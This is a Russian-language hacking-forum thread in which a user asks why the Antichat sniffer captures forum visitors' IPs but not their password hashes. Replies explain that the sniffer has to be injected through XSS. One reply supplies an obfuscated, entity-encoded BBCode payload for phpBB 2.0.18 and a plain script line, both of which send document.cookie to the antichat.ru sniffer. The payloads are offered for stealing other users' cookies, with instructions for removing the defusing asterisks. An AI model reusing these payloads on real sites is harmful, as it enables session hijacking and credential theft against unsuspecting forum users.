Нет Меня не совсем поняли! У Античата есть СНИФЕР по адрессу http://antichat.ru/sniff/ Я отправляю Форумщику сайт http://antichat.ru/cgi-bin/s.jpg?Test Зайдя по ссылке В логе http://antichat.ru/sniff/log.php приходит его IP и форум на котором он находится НО НЕ ПРИХОДИТ хеш MD5 пароля!
чтоб получить Md5 хеш, грубо говоря, надо сслыку на сниффер внедрить в сам форум, а не дать ссылку (получится тока в том случае если форум уязвим). Об уязвимостях есть куча статей, ищи и найдешь.
Ну вот почитай здесь например про уязвимости форумов там описаана XSS и какие коды вставлять в форум я думаю расписано понятно попробуй подправь коды под себя и попробуй кому нибудь отослать данное сообщение с этим кодом... http://forum.antichat.ru/thread15678.html http://forum.antichat.ru/thread12610.html
Бля ну в тех же 2х топиках там примеров валом что я давал и для разных убираеш * где поставлены в коде и всавляеш в форум и всё.... Вот XSS для phpBB 2.0.18 вставляй в форум только убери * и куки придут на снифер античата... Code: [UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]
<html> .... <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> .... </html> типа такого должно быть в исходниках страницы. А вообще, хочется сказать "закрываю тему", но не могу, прав не хватает...
пля, не могу понять, тут литературы и постов на dvd не влезет, а ты тут с 04.09.2005 и так и не смог прочитать иль разобратся??? Не ленитесь искать пля, иль это привилегия только избранных, просто пропарсить и отложить в мозг парочку тем и заметок с форума, иль просто воспользоватся поиском?? podkashey, спс, ты прав. Я б даж с удовольствием в топку, но.....CLOSED!
